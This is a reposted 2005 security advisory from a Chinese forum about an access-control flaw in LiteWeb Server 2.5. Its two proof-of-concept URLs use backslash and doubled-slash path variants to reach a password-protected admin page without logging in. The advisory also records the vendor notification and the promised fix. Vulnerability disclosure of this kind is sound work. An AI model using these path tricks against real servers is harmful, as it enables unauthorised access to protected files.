[转载]LiteWeb允许远程用户访问受限制页面
文章作者:[email]gss_it@yahoo.com[/email]Application: LiteWeb Server
Web Site: [url]www.cmfperception.com[/url]
Versions: 2.5
Platform: Windows
Bug: An access control vulnerability.
Credits:
########
#########################################
# == Ziv Kamir == #
# #
# GSSIT - Global Security Solution IT #
# #
# Email : [email]gss_it@yahoo.com[/email] #
# #
# Web : [url]www.gssit.co.il[/url] #
# #
#########################################
---------------------
1) Introduction
2) Bug
3) The Code
4) Fix
================
1) Introduction
================
LiteWeb is a powerful web server that handles multiple domains
and supports PHP, Perl, MySQL, and much more.
=======
2) Bug
=======
A remote user may obtain password-protected files on the server without having to authenticate.
===========
3) The Code
===========
[url]http://Target/[/url]\admin\/login.html
[url]http://Target//admin//login.html[/url]
======
4) Fix
======
Date of Vendor Notification:
----------------------------
02/06/05
Response:
---------
02/06/05
It will be fixed in the next version.
页:
[1]